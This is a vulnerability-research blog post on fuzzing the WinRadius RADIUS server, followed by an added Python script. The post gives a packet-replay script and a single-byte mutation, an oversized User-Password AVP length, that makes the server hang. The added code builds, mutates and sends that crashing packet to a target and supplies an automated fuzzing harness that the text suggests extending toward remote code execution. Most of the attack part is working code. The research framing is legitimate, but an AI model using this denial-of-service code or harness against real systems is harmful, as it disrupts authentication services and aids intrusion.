I set some time aside to test WinRadius yesterday. Fuzzing was done manually and using a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.
Firstly, to ensure that our setup is good and to capture a known-good packet to work from, we can use `radclient`. I set up a user account adam/adam for testing purposes and then tried to authenticate:
radclient will form a RADIUS request from our STDIN data
We capture the packet we sent and the response
And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template within Python, and did so as follows:
```python
#!/usr/bin/python
from socket import *

# Access-Request replayed byte-for-byte from the radclient capture. Because the
# Request Authenticator and the obfuscated User-Password are reused together,
# WinRadius recovers the same plaintext every time without us knowing the secret.
pwn = b"\x01"                                                                 # Code 1 = Access-Request
pwn += b"\xff"                                                                # packet identifier
pwn += b"\x00\x2c"                                                            # length 44 = 20-byte header + 6 + 18
pwn += b"\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23"    # Request Authenticator (16 bytes)
pwn += b"\x01"                                                                # AVP type 1 = User-Name
pwn += b"\x06"                                                                # AVP length 6 (2-byte header + 4)
pwn += b"\x61\x64\x61\x6d"                                                    # "adam"
pwn += b"\x02"                                                                # AVP type 2 = User-Password
pwn += b"\x12"                                                                # AVP length 18 (2-byte header + 16)
pwn += b"\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21"    # password, obfuscated per RFC 2865 s5.2

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)
server_socket.sendto(pwn, address)
```
We can now replay this packet as we wish, and confirm through Wireshark and WinRadius that all is good and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing the User-Password AVP length byte from \x12 to \xff caused the application to consume all available CPU and hang indefinitely. I couldn't cause a crash, although with a bit more trial and error, as well as trying different RADIUS requests such as accounting start/stop, I'd be surprised if there wasn't an RCE somewhere here.
The application now hangs.
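The template above replays the authenticator and the already-obfuscated password captured from radclient, which is why it works without the shared secret but can only ever send that one credential. The script below is an added example, not code from the original post: it builds the same 44-byte Access-Request from scratch, including the User-Password obfuscation from RFC 2865 section 5.2 (which does need the shared secret; `testing123` is an assumed value, and the authenticator is random rather than the captured one), parses the attribute list back with the two length checks a server must apply, and then applies the single-byte mutation described above (User-Password AVP length byte set to 0xff, header length left at 44) to show that a parser with those checks rejects the packet instead of walking past the end of the datagram. The target address is the lab host from the post.

```python
#!/usr/bin/env python3
"""Added example (not from the original post): build, parse and mutate
RADIUS Access-Request packets per RFC 2865."""
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
HEADER_LEN = 20

SECRET = b"testing123"               # assumed; the post does not give the secret
TARGET = ("192.168.200.20", 1812)    # lab target from the post


def obfuscate_password(password, secret, authenticator):
    """RFC 2865 s5.2: pad to a 16-byte multiple, XOR each block with
    MD5(secret + previous ciphertext block), seeded with the authenticator."""
    if not 1 <= len(password) <= 128:
        raise ValueError("User-Password must be 1..128 bytes")
    padded = password.ljust((len(password) + 15) // 16 * 16, b"\x00")
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        out, prev = out + block, block
    return out


def deobfuscate_password(cipher, secret, authenticator):
    """Inverse of obfuscate_password; this is what the server does."""
    if not cipher or len(cipher) % 16:
        raise ValueError("ciphertext must be a non-empty multiple of 16 bytes")
    out, prev = b"", authenticator
    for i in range(0, len(cipher), 16):
        key = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(cipher[i:i + 16], key))
        prev = cipher[i:i + 16]
    return out.rstrip(b"\x00")


def avp(attr_type, value):
    """Type-Length-Value; the length byte counts its own 2-byte header."""
    if not 1 <= len(value) <= 253:
        raise ValueError("AVP value must be 1..253 bytes")
    return bytes([attr_type, len(value) + 2]) + value


def build_access_request(identifier, authenticator, username, password,
                         secret=SECRET, code=ACCESS_REQUEST):
    attrs = avp(ATTR_USER_NAME, username)
    attrs += avp(ATTR_USER_PASSWORD, obfuscate_password(password, secret, authenticator))
    header = struct.pack("!BBH", code, identifier, HEADER_LEN + len(attrs))
    return header + authenticator + attrs


def parse_avps(packet):
    """Walk the attribute list the way a server should: the header length must
    fit the datagram, every AVP length must be >= 2 (otherwise the cursor never
    advances) and no AVP may run past the header length."""
    if len(packet) < HEADER_LEN:
        raise ValueError("short packet")
    code, identifier, length = struct.unpack("!BBH", packet[:4])
    if length < HEADER_LEN or length > len(packet):
        raise ValueError("header length %d vs datagram of %d bytes" % (length, len(packet)))
    pos, attrs = HEADER_LEN, []
    while pos < length:
        if length - pos < 2:
            raise ValueError("truncated AVP header at offset %d" % pos)
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2:
            raise ValueError("AVP length %d at offset %d never advances" % (attr_len, pos))
        if pos + attr_len > length:
            raise ValueError("AVP length %d at offset %d overruns packet" % (attr_len, pos))
        attrs.append((attr_type, packet[pos + 2:pos + attr_len]))
        pos += attr_len
    return attrs


def set_avp_length(packet, attr_type, new_len):
    """Copy of packet with the length byte of the first AVP of attr_type
    overwritten; the header length is left alone, as in the manual test."""
    length = struct.unpack("!H", packet[2:4])[0]
    pos = HEADER_LEN
    while pos + 2 <= length:
        t, l = packet[pos], packet[pos + 1]
        if t == attr_type:
            return packet[:pos + 1] + bytes([new_len & 0xff]) + packet[pos + 2:]
        if l < 2:
            break
        pos += l
    raise ValueError("attribute %d not found" % attr_type)


def length_fuzz_cases(packet, attr_type):
    """Yield (value, mutated packet) for every possible AVP length byte."""
    for v in range(256):
        yield v, set_avp_length(packet, attr_type, v)


if __name__ == "__main__":
    import socket
    good = build_access_request(0xff, os.urandom(16), b"adam", b"adam")
    bad = set_avp_length(good, ATTR_USER_PASSWORD, 0xff)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(good, TARGET)   # should be accepted like the replayed capture
    sock.sendto(bad, TARGET)    # the mutation that hung WinRadius in the post
```

Run with no arguments to send one good request followed by the mutated one; `length_fuzz_cases` produces all 256 length-byte values for a chosen attribute so the manual trial and error can be automated, and the `code` parameter of `build_access_request` lets the same harness target other packet types.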